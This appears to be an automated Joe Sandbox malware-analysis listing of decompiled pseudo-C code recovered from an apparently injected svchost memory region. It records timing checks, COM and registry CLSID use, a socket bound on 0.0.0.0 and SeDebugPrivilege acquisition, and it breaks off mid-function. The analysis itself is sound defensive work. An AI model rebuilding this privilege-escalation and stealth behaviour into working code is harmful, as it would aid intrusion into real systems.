                                                            			E0000022B22BAF534410(char* __rcx, long long __rbp, long long __r12, long long __r14, long long __r15, void* _a16, void* _a24) {
                                                            				void* _v32;
                                                            				void* _v40;
                                                            				signed int _v48;
                                                            				long long _v62;
                                                            				long long _v70;
                                                            				long long _v78;
                                                            				long long _v86;
                                                            				char _v88;
                                                            				long _t71;
                                                            				signed int _t79;
                                                            				intOrPtr _t123;
                                                            				signed long long _t131;
                                                            				intOrPtr _t138;
                                                            				intOrPtr _t146;
                                                            				void* _t157;
                                                            				void* _t161;
                                                            				void* _t164;
                                                            				long long _t167;
                                                            				long long _t168;
                                                            				void* _t169;
                                                            
                                                            				_t169 = _t164;
                                                            				_t131 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v48 = _t131 ^ _t164 - 0x00000070;
                                                            				 *((long long*)(_t169 + 0x10)) = __rbp;
                                                            				 *((long long*)(_t169 + 0x18)) = __r12;
                                                            				 *((long long*)(_t169 - 0x20)) = __r14;
                                                            				 *((long long*)(_t169 - 0x28)) = __r15;
                                                            				r14d = GetTickCount();
                                                            				_t71 = GetTickCount();
                                                            				_v88 = 0x267;
                                                            				if ( *((intOrPtr*)(__rcx + 1)) == sil) goto 0xaf534573;
                                                            				if (0x10624dd3 * (GetTickCount() - _t71) >> 0x20 >> 6 - 5 < 0) goto 0xaf53452f;
                                                            				GetTickCount();
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 8)) + 8)) == 0) goto 0xaf5344e9;
                                                            				_t168 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				_t167 =  *((intOrPtr*)(__rcx + 0x20));
                                                            				_v86 = _t168;
                                                            				_v70 = _t168 -  *((intOrPtr*)(__rcx + 0x18));
                                                            				_v78 = _t167;
                                                            				r9b = 0x3f;
                                                            				_v62 = _t167 -  *((intOrPtr*)(__rcx + 0x20));
                                                            				r8d = 0x22;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(__rcx + 0x10)),  &_v88);
                                                            				_t138 =  *((intOrPtr*)(__rcx + 8));
                                                            				if ( *((short*)(_t138 + 0x16)) != 2) goto 0xaf53452f;
                                                            				_t157 = _t161;
                                                            				_t123 =  *((intOrPtr*)(_t138 + 0x1c));
                                                            				if (_t123 <= 0) goto 0xaf53452f;
                                                            				_t79 = E0000022B22BAF5643C0(_t138);
                                                            				if (_t123 >= 0) goto 0xaf534515;
                                                            				_t146 =  *((intOrPtr*)(__rcx + 8));
                                                            				 *((char*)(_t157 +  *((intOrPtr*)(_t146 + 0x40)))) = ((_t79 & 0x800000ff) - 0x00000001 | 0xffffff00) + 1;
                                                            				if (_t157 + 1 - _t146 < 0) goto 0xaf534500;
                                                            				Sleep(??);
                                                            				if (0x88888889 * (0x10624dd3 * (GetTickCount() - r14d) >> 0x20 >> 6) >> 0x20 >> 5 - ( *( *((intOrPtr*)(__rcx + 8)) + 0x14) & 0x0000ffff) < 0) goto 0xaf534569;
                                                            				 *((intOrPtr*)(__rcx + 1)) = sil;
                                                            				if ( *((intOrPtr*)(__rcx + 1)) != sil) goto 0xaf534468;
                                                            				if ( *((intOrPtr*)(__rcx + 0x50)) == _t161) goto 0xaf5345d4;
                                                            				if (0 -  *( *((intOrPtr*)(__rcx + 8)) + 0x12) >= 0) goto 0xaf5345d1;
                                                            				WaitForSingleObject(??, ??);
                                                            				CloseHandle(??);
                                                            				if (1 - ( *( *((intOrPtr*)(__rcx + 8)) + 0x12) & 0x0000ffff) < 0) goto 0xaf5345a0;
                                                            				 *__rcx = 1;
                                                            				r9b = 0x3f;
                                                            				_v88 = 0x67;
                                                            				r8d = 2;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(__rcx + 0x10)),  &_v88);
                                                            				return E0000022B22BAF55A7C0( *( *((intOrPtr*)(__rcx + 8)) + 0x14) & 0x0000ffff,  *((intOrPtr*)(__rcx + 8)), _v48 ^ _t164 - 0x00000070);
                                                            			}























                                                            0x22baf534410
                                                            0x22baf53441a
                                                            0x22baf534424
                                                            0x22baf534429
                                                            0x22baf534430
                                                            0x22baf534434
                                                            0x22baf534438
                                                            0x22baf534442
                                                            0x22baf534445
                                                            0x22baf534457
                                                            0x22baf534462
                                                            0x22baf534481
                                                            0x22baf534487
                                                            0x22baf534496
                                                            0x22baf534498
                                                            0x22baf53449e
                                                            0x22baf5344af
                                                            0x22baf5344b4
                                                            0x22baf5344bf
                                                            0x22baf5344c7
                                                            0x22baf5344d9
                                                            0x22baf5344de
                                                            0x22baf5344e4
                                                            0x22baf5344e9
                                                            0x22baf5344f2
                                                            0x22baf5344f4
                                                            0x22baf5344f7
                                                            0x22baf5344fa
                                                            0x22baf534500
                                                            0x22baf53450a
                                                            0x22baf534515
                                                            0x22baf53451d
                                                            0x22baf53452d
                                                            0x22baf534534
                                                            0x22baf534563
                                                            0x22baf534565
                                                            0x22baf53456d
                                                            0x22baf534591
                                                            0x22baf53459b
                                                            0x22baf5345ab
                                                            0x22baf5345b9
                                                            0x22baf5345cf
                                                            0x22baf5345d1
                                                            0x22baf5345dd
                                                            0x22baf5345e0
                                                            0x22baf5345e7
                                                            0x22baf5345ed
                                                            0x22baf534608

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CountTick$CloseHandleObjectSingleSleepWait
                                                            • String ID: g
                                                            • API String ID: 455057565-30677878
                                                            • Opcode ID: 53c77d12224bbc1b71423d713c8ff6aa1bb7a5c81b0a81db7ecb53307d3e0af0
                                                            • Instruction ID: cdccd48a476ac9b1b746edc36c110eb1313ff59c2d1b5f4fbd79a6e1e9093fa5
                                                            • Opcode Fuzzy Hash: 53c77d12224bbc1b71423d713c8ff6aa1bb7a5c81b0a81db7ecb53307d3e0af0
                                                            • Instruction Fuzzy Hash: 4751FE23614B80D2EB258F6AE44C29DBBA2F788F94F048116DE4D8779ACF39C840C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                            • String ID: N$<$<$`
                                                            • API String ID: 1949328396-1393152752
                                                            • Opcode ID: c133e2671cc4dfce594399caa41b7cb7d14346470af3101afa89c1d99431679d
                                                            • Instruction ID: 28b5fde0ceef06e3f9aeea188526c0553dc651ea425bdb641814e97e74017062
                                                            • Opcode Fuzzy Hash: c133e2671cc4dfce594399caa41b7cb7d14346470af3101afa89c1d99431679d
                                                            • Instruction Fuzzy Hash: FB418873210B9492F76ACF78E46879933A9F744F48F184229DF590AB9ACF7A8051CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E0000022B22BAF533440(signed char __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi) {
                                                            				void* _t61;
                                                            				signed char _t75;
                                                            				signed long long _t104;
                                                            				void* _t108;
                                                            				intOrPtr _t113;
                                                            				void* _t114;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t120;
                                                            				intOrPtr* _t128;
                                                            				intOrPtr _t135;
                                                            				void* _t136;
                                                            				intOrPtr* _t138;
                                                            				intOrPtr* _t139;
                                                            				intOrPtr* _t140;
                                                            				intOrPtr* _t141;
                                                            				void* _t144;
                                                            				intOrPtr* _t148;
                                                            				intOrPtr _t153;
                                                            				intOrPtr* _t156;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				void* _t161;
                                                            				signed long long _t162;
                                                            				void* _t174;
                                                            				signed long long _t176;
                                                            
                                                            				_t144 = __rdx;
                                                            				_t75 = __ecx;
                                                            				 *((long long*)(_t161 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t161 + 0x20)) = __rdi;
                                                            				_t159 = _t161 - 0x47;
                                                            				_t162 = _t161 - 0xa0;
                                                            				_t104 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t159 + 0x37) = _t104 ^ _t162;
                                                            				r15d = 0;
                                                            				_t156 = __rcx;
                                                            				r14d = r15d;
                                                            				if (__rcx == 0) goto 0xaf5334a0;
                                                            				_t153 =  *((intOrPtr*)(__rcx + 8));
                                                            				_t120 =  *__rcx;
                                                            				if (_t120 == _t153) goto 0xaf533499;
                                                            				_t61 = E0000022B22BAF5339E0(__ecx, _t120);
                                                            				if (_t120 + 0x20 != _t153) goto 0xaf533488;
                                                            				 *((long long*)(_t156 + 8)) =  *_t156;
                                                            				 *(_t159 - 0x11) = _t176;
                                                            				 *(_t159 - 0x19) = _t176;
                                                            				 *(_t159 - 0x29) = _t176;
                                                            				 *((long long*)(_t162 + 0x20)) = _t159 - 0x11;
                                                            				_t13 = _t144 + 1; // 0x1
                                                            				r8d = _t13;
                                                            				__imp__CoCreateInstance();
                                                            				if (_t61 < 0) goto 0xaf53364d;
                                                            				r9d = 0;
                                                            				_t108 =  *( *(_t159 - 0x11));
                                                            				if ( *((intOrPtr*)(_t108 + 0x18))() != 0) goto 0xaf53364d;
                                                            				_t17 = _t108 + 8; // 0x8
                                                            				_t128 =  *(_t159 - 0x29);
                                                            				if (_t128 == 0) goto 0xaf533517;
                                                            				 *(_t159 - 0x29) = _t176;
                                                            				 *((intOrPtr*)( *_t128 + 0x10))();
                                                            				if ( *((intOrPtr*)( *( *(_t159 - 0x19)) + 0x18))() != 0) goto 0xaf53364d;
                                                            				 *(_t159 - 0x21) = _t176;
                                                            				 *((long long*)(_t162 + 0x20)) = _t159 - 0x21;
                                                            				r8d = 0;
                                                            				if ( *((intOrPtr*)( *( *(_t159 - 0x29)) + 0x48))() < 0) goto 0xaf533635;
                                                            				 *((short*)(_t159 - 1)) = _t17;
                                                            				r9d = 0;
                                                            				if ( *((intOrPtr*)( *( *(_t159 - 0x21)) + 0x18))() < 0) goto 0xaf533635;
                                                            				_t148 =  *((intOrPtr*)(_t159 + 7));
                                                            				 *((long long*)(_t159 + 0x2f)) = 7;
                                                            				 *(_t159 + 0x27) = _t176;
                                                            				 *((intOrPtr*)(_t159 + 0x17)) = r15w;
                                                            				if ( *_t148 != r15w) goto 0xaf5335a5;
                                                            				goto 0xaf5335ba;
                                                            				if ( *((intOrPtr*)(_t148 + ((_t176 | 0xffffffff) + 1) * 2)) != r15w) goto 0xaf5335b0;
                                                            				E0000022B22BAF533B50(0xffffffff, _t159 + 0x17, _t148, _t156, (_t176 | 0xffffffff) + 1, _t176, _t174);
                                                            				__imp__#6();
                                                            				r14d = r14d + 1;
                                                            				if (_t156 == 0) goto 0xaf5335e1;
                                                            				E0000022B22BAF533880(0xffffffff, _t156, _t159 + 0x17, _t156, _t158);
                                                            				_t113 =  *((intOrPtr*)(_t159 + 0x2f));
                                                            				if (_t113 - _t153 < 0) goto 0xaf533635;
                                                            				_t135 =  *((intOrPtr*)(_t159 + 0x17));
                                                            				_t114 = _t113 + 1;
                                                            				if (_t114 - 0xffffffff > 0) goto 0xaf5336be;
                                                            				if (_t114 + _t114 - 0x1000 < 0) goto 0xaf533630;
                                                            				if ((_t75 & 0x0000001f) != 0) goto 0xaf5336b8;
                                                            				_t116 =  *((intOrPtr*)(_t135 - 8));
                                                            				if (_t116 - _t135 >= 0) goto 0xaf5336b2;
                                                            				_t136 = _t135 - _t116;
                                                            				if (_t136 - _t153 < 0) goto 0xaf5336ac;
                                                            				if (_t136 - 0x27 > 0) goto 0xaf5336a6;
                                                            				0xaf55a85c();
                                                            				_t138 =  *(_t159 - 0x21);
                                                            				if (_t138 == 0) goto 0xaf533504;
                                                            				 *((intOrPtr*)( *_t138 + 0x10))();
                                                            				goto 0xaf533504;
                                                            				_t139 =  *(_t159 - 0x29);
                                                            				if (_t139 == 0) goto 0xaf53365c;
                                                            				 *((intOrPtr*)( *_t139 + 0x10))();
                                                            				_t140 =  *(_t159 - 0x19);
                                                            				if (_t140 == 0) goto 0xaf53366b;
                                                            				 *((intOrPtr*)( *_t140 + 0x10))();
                                                            				_t141 =  *(_t159 - 0x11);
                                                            				if (_t141 == 0) goto 0xaf53367a;
                                                            				 *((intOrPtr*)( *_t141 + 0x10))();
                                                            				return E0000022B22BAF55A7C0(_t75,  *_t139,  *(_t159 + 0x37) ^ _t162);
                                                            			}




























                                                            0x22baf533440
                                                            0x22baf533440
                                                            0x22baf533440
                                                            0x22baf533445
                                                            0x22baf53344a
                                                            0x22baf533454
                                                            0x22baf533459
                                                            0x22baf533460
                                                            0x22baf53346a
                                                            0x22baf53346e
                                                            0x22baf533471
                                                            0x22baf533474
                                                            0x22baf53347a
                                                            0x22baf53347c
                                                            0x22baf533480
                                                            0x22baf533486
                                                            0x22baf53348b
                                                            0x22baf533497
                                                            0x22baf53349c
                                                            0x22baf5334a2
                                                            0x22baf5334aa
                                                            0x22baf5334b5
                                                            0x22baf5334c0
                                                            0x22baf5334c5
                                                            0x22baf5334c5
                                                            0x22baf5334c9
                                                            0x22baf5334d1
                                                            0x22baf5334df
                                                            0x22baf5334e9
                                                            0x22baf5334f1
                                                            0x22baf5334f7
                                                            0x22baf533504
                                                            0x22baf53350b
                                                            0x22baf53350d
                                                            0x22baf533514
                                                            0x22baf533530
                                                            0x22baf53353e
                                                            0x22baf533549
                                                            0x22baf53354e
                                                            0x22baf53355b
                                                            0x22baf533569
                                                            0x22baf533574
                                                            0x22baf53357f
                                                            0x22baf533585
                                                            0x22baf533589
                                                            0x22baf533591
                                                            0x22baf533595
                                                            0x22baf53359e
                                                            0x22baf5335a3
                                                            0x22baf5335b8
                                                            0x22baf5335be
                                                            0x22baf5335c7
                                                            0x22baf5335cd
                                                            0x22baf5335d3
                                                            0x22baf5335dc
                                                            0x22baf5335e1
                                                            0x22baf5335e8
                                                            0x22baf5335ea
                                                            0x22baf5335ee
                                                            0x22baf5335f4
                                                            0x22baf533603
                                                            0x22baf533608
                                                            0x22baf53360e
                                                            0x22baf533615
                                                            0x22baf53361b
                                                            0x22baf533621
                                                            0x22baf53362b
                                                            0x22baf533630
                                                            0x22baf533635
                                                            0x22baf53363c
                                                            0x22baf533645
                                                            0x22baf533648
                                                            0x22baf53364d
                                                            0x22baf533654
                                                            0x22baf533659
                                                            0x22baf53365c
                                                            0x22baf533663
                                                            0x22baf533668
                                                            0x22baf53366b
                                                            0x22baf533672
                                                            0x22baf533677
                                                            0x22baf5336a5

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CreateFreeInstanceString
                                                            • String ID: FriendlyName
                                                            • API String ID: 3051947498-3623505368
                                                            • Opcode ID: b5f6a59e4aa91acd15e0f4b48202dd26d3c59404340bd2cdb4cc0bdb31d4c61e
                                                            • Instruction ID: 0eb4ca73faabd18d3c1d78a35498e80c8bd9bb7c8c98e70310ba339ef2942e19
                                                            • Opcode Fuzzy Hash: b5f6a59e4aa91acd15e0f4b48202dd26d3c59404340bd2cdb4cc0bdb31d4c61e
                                                            • Instruction Fuzzy Hash: E2714663711A44AAFB26DFE9D06C3EC33A0EB48B98F415A11DE1A17B96DF3AC445C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue$wsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s\%s
                                                            • API String ID: 206570251-512145251
                                                            • Opcode ID: 42bfb82e09fd1e23d32cec216227443db27facc9d003485a6b487521fae5df74
                                                            • Instruction ID: 3e7daaddbdee6ce3bfd44d849d3ea87e4fac78e30f505897d524994535e1e111
                                                            • Opcode Fuzzy Hash: 42bfb82e09fd1e23d32cec216227443db27facc9d003485a6b487521fae5df74
                                                            • Instruction Fuzzy Hash: BA51B133608B8092D7318F65F4897DEB7A1F788794F440216EA9947A9ADF79C509CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E0000022B22BAF5564C0(void* __ecx, void* __edx, void* __rcx, intOrPtr* __rdx, long long __rbp, void* __r9, long long __r15, long long _a24) {
                                                            				long long _v40;
                                                            				signed int _v56;
                                                            				void* _v88;
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t24;
                                                            				void* _t27;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            				signed long long _t54;
                                                            				signed long long _t55;
                                                            				intOrPtr* _t70;
                                                            				void* _t73;
                                                            				void* _t74;
                                                            
                                                            				_t70 = __rdx;
                                                            				_t54 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t55 = _t54 ^  &_v88;
                                                            				_v56 = _t55;
                                                            				_t74 = __rcx;
                                                            				if (__rdx == 0) goto 0xaf5564ec;
                                                            				_t2 = _t73 + 1; // 0x1
                                                            				r14d = _t2;
                                                            				if ( *__rdx != 0) goto 0xaf5564ef;
                                                            				r14d = 0;
                                                            				_v88 = 0;
                                                            				_t58 =  !=  ? __rdx : L"0.0.0.0";
                                                            				_v88 = E0000022B22BAF54FDE0( !=  ? __rdx : L"0.0.0.0");
                                                            				_t24 = E0000022B22BAF54FED0(0,  !=  ? __rdx : L"0.0.0.0",  !=  ? __rdx : L"0.0.0.0",  &_v88);
                                                            				if (_t24 == 0) goto 0xaf5565f5;
                                                            				_t7 = _t70 + 5; // 0x6
                                                            				r8d = _t7;
                                                            				__imp__#23();
                                                            				if (_t55 == 0xffffffff) goto 0xaf5565f5;
                                                            				_a24 = __rbp;
                                                            				_v40 = __r15;
                                                            				r15d = 0x1c;
                                                            				r8d = r15d;
                                                            				r8d =  ==  ? 0x10 : r8d;
                                                            				__imp__#2();
                                                            				if (_t24 == 0xffffffff) goto 0xaf5565c8;
                                                            				E0000022B22BAF550280();
                                                            				 *(_t74 + 0x48) = _t55;
                                                            				E0000022B22BAF550320();
                                                            				 *(_t74 + 0x50) = _t55;
                                                            				if (r14d == 0) goto 0xaf5565c1;
                                                            				if ( &_v88 == _t74 + 0x78) goto 0xaf5565c1;
                                                            				_t41 =  !=  ? r15d : 0x10;
                                                            				r8d =  !=  ? r15d : 0x10;
                                                            				_t27 = E0000022B22BAF562BA0(_v88 & 0x0000ffff, 0, _t39, _t42, _t74 + 0x78,  &_v88, _t73, _t74,  &_v88);
                                                            				goto 0xaf5565dd;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t74 + 0x74)) = 4;
                                                            				SetLastError(??);
                                                            				__imp__#3();
                                                            				goto 0xaf55660a;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t74 + 0x74)) = 3;
                                                            				SetLastError(??);
                                                            				return E0000022B22BAF55A7C0(_t27,  &_v88, _v56 ^  &_v88);
                                                            			}


















                                                            0x22baf5564c0
                                                            0x22baf5564ca
                                                            0x22baf5564d1
                                                            0x22baf5564d4
                                                            0x22baf5564db
                                                            0x22baf5564e1
                                                            0x22baf5564e3
                                                            0x22baf5564e3
                                                            0x22baf5564ea
                                                            0x22baf5564ec
                                                            0x22baf5564f2
                                                            0x22baf5564fe
                                                            0x22baf55650c
                                                            0x22baf556519
                                                            0x22baf556520
                                                            0x22baf556530
                                                            0x22baf556530
                                                            0x22baf556534
                                                            0x22baf556541
                                                            0x22baf556552
                                                            0x22baf55655d
                                                            0x22baf556567
                                                            0x22baf55656d
                                                            0x22baf556570
                                                            0x22baf556574
                                                            0x22baf55657d
                                                            0x22baf556582
                                                            0x22baf55658a
                                                            0x22baf55658e
                                                            0x22baf556593
                                                            0x22baf55659a
                                                            0x22baf5565a8
                                                            0x22baf5565b5
                                                            0x22baf5565b9
                                                            0x22baf5565bc
                                                            0x22baf5565c6
                                                            0x22baf5565c8
                                                            0x22baf5565d0
                                                            0x22baf5565d7
                                                            0x22baf5565e0
                                                            0x22baf5565f3
                                                            0x22baf5565f5
                                                            0x22baf5565fd
                                                            0x22baf556604
                                                            0x22baf556622

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 2609815416-3771769585
                                                            • Opcode ID: 99926b02a6ac1911a3d1b1cfecf3b375f1239a906846057dafcdd092e91f4822
                                                            • Instruction ID: 8cced34ef66bf076dc9606a5683d711a4ecc31c23cc83d7d14b96f7d9660e0ac
                                                            • Opcode Fuzzy Hash: 99926b02a6ac1911a3d1b1cfecf3b375f1239a906846057dafcdd092e91f4822
                                                            • Instruction Fuzzy Hash: 2831B363200A85A3EA729F95F41C3DEB3A1FB84B94F844220DE5E0379AEF7EC4458740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$Throw$FileHeaderRaisestd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 2393553977-0
                                                            • Opcode ID: 8e73cdea62212a0212ba7422e27af5d0c0934dacf2682f8e31b08b9c191672eb
                                                            • Instruction ID: 06610a0ac5e014de170f288b6b4c09dd814123e39746b107093be87dc6301a6d
                                                            • Opcode Fuzzy Hash: 8e73cdea62212a0212ba7422e27af5d0c0934dacf2682f8e31b08b9c191672eb
                                                            • Instruction Fuzzy Hash: E151DBB7710B80AAEB2DEFB2981E1EE3356A784780F08C935B9590BB5BDF35D4118240
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF54DBB0() {
                                                            				signed int _v16;
                                                            				void* _v40;
                                                            				void* _t9;
                                                            				signed long long _t13;
                                                            				signed long long _t19;
                                                            
                                                            				_t13 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v16 = _t13 ^ _t19;
                                                            				GetCurrentProcess();
                                                            				if (OpenProcessToken(??, ??, ??) != 0) goto 0xaf54dbf8;
                                                            				return E0000022B22BAF55A7C0(_t9, _t13 ^ _t19, _v16 ^ _t19);
                                                            			}








                                                            0x22baf54dbb6
                                                            0x22baf54dbc0
                                                            0x22baf54dbca
                                                            0x22baf54dbe3
                                                            0x22baf54dbf7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 3398352648-2896544425
                                                            • Opcode ID: 81907008b757056a952eefbc7216d2a619f775bbd32000834ab7415d27bdccaa
                                                            • Instruction ID: a182b8dd80f2cc398d5de5eaae4d5e4d8b2802a4751a762123e254d0b87122d6
                                                            • Opcode Fuzzy Hash: 81907008b757056a952eefbc7216d2a619f775bbd32000834ab7415d27bdccaa
                                                            • Instruction Fuzzy Hash: F1116073214B44A2EB218F61F85D29EB7B1FBC8B81F400116EA9E43A2ADF39C045CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E0000022B22BAF532FA0(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                                            				void* __r14;
                                                            				void* __r15;
                                                            				void* _t176;
                                                            				void* _t188;
                                                            				void* _t189;
                                                            				void* _t190;
                                                            				signed long long _t222;
                                                            				intOrPtr _t234;
                                                            				long long _t243;
                                                            				long long _t253;
                                                            				intOrPtr* _t256;
                                                            				intOrPtr* _t261;
                                                            				intOrPtr _t269;
                                                            				intOrPtr* _t272;
                                                            				intOrPtr _t277;
                                                            				intOrPtr* _t280;
                                                            				intOrPtr* _t284;
                                                            				intOrPtr* _t288;
                                                            				intOrPtr* _t289;
                                                            				intOrPtr* _t290;
                                                            				void* _t312;
                                                            				void* _t317;
                                                            				void* _t318;
                                                            				void* _t320;
                                                            				signed long long _t321;
                                                            				void* _t342;
                                                            				void* _t344;
                                                            
                                                            				_t314 = __rsi;
                                                            				_t253 = __rbx;
                                                            				 *((long long*)(_t320 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t320 + 0x20)) = __rdi;
                                                            				_t318 = _t320 - 0x50;
                                                            				_t321 = _t320 - 0x150;
                                                            				_t222 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t318 + 0x40) = _t222 ^ _t321;
                                                            				_t312 = __rcx;
                                                            				r14d = r9d;
                                                            				_t256 =  *((intOrPtr*)(__rcx + 0xe0));
                                                            				r15d = r8d;
                                                            				_t189 = __edx;
                                                            				if (_t256 == 0) goto 0xaf532fe6;
                                                            				 *((intOrPtr*)( *_t256 + 0x48))(_t317);
                                                            				if (E0000022B22BAF532A30(__rbx, __rcx, __rdx, __rcx, __rsi, _t342, _t344, _t342) == 0) goto 0xaf533416;
                                                            				 *((long long*)(_t321 + 0x178)) = _t253;
                                                            				 *((long long*)(_t321 + 0x40)) = _t253;
                                                            				if (E0000022B22BAF5336D0(_t135, _t189, __rcx, __rcx, _t314, _t321 + 0x40, _t342, _t344) == 0) goto 0xaf5333fc;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xd0)))) + 0x18))();
                                                            				E0000022B22BAF532D90(__rcx,  *((intOrPtr*)(__rcx + 0xd8)), __rcx,  *((intOrPtr*)(_t321 + 0x40)));
                                                            				 *((long long*)(_t321 + 0x38)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) = _t321 + 0x38;
                                                            				_t18 = _t253 + 1; // 0x1
                                                            				r8d = _t18;
                                                            				__imp__CoCreateInstance();
                                                            				_t261 =  *((intOrPtr*)(_t321 + 0x38));
                                                            				if (_t261 == 0) goto 0xaf5333fc;
                                                            				 *((long long*)(_t321 + 0x48)) = _t253;
                                                            				 *((intOrPtr*)( *_t261))();
                                                            				_t23 = _t253 + 0x58; // 0x58
                                                            				r8d = _t23;
                                                            				_t263 =  <  ? _t253 :  *((intOrPtr*)(_t321 + 0x48));
                                                            				 *((long long*)(_t321 + 0x48)) =  <  ? _t253 :  *((intOrPtr*)(_t321 + 0x48));
                                                            				E0000022B22BAF563830(_t176, 0, _t188, _t190, _t321 + 0x60, 0xaf57f888, __rcx, _t321 + 0x48);
                                                            				asm("movups xmm0, [0x4c6de]");
                                                            				asm("movups xmm1, [0x4c6dd]");
                                                            				asm("movaps [esp+0x60], xmm0");
                                                            				asm("movaps [esp+0x70], xmm1");
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x20))() < 0) goto 0xaf5333dc;
                                                            				if (r15d == 0) goto 0xaf5331ea;
                                                            				if (r14d == 0) goto 0xaf5331ea;
                                                            				 *((long long*)(_t321 + 0x28)) = _t321 + 0x50;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t321 + 0x50)) = _t253;
                                                            				 *((long long*)(_t321 + 0x30)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) = 0xaf57f8b8;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x30))() >= 0) goto 0xaf533168;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t321 + 0x28)) = _t321 + 0x50;
                                                            				 *((long long*)(_t321 + 0x20)) = 0xaf57f8b8;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x30))() < 0) goto 0xaf5331ea;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x50)))) + 0x30))() < 0) goto 0xaf5331ea;
                                                            				_t269 =  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x30)) + 0x50));
                                                            				 *((intOrPtr*)(_t269 + 0x34)) = r15d;
                                                            				 *((intOrPtr*)(_t269 + 0x38)) = r14d;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x50)))) + 0x18))();
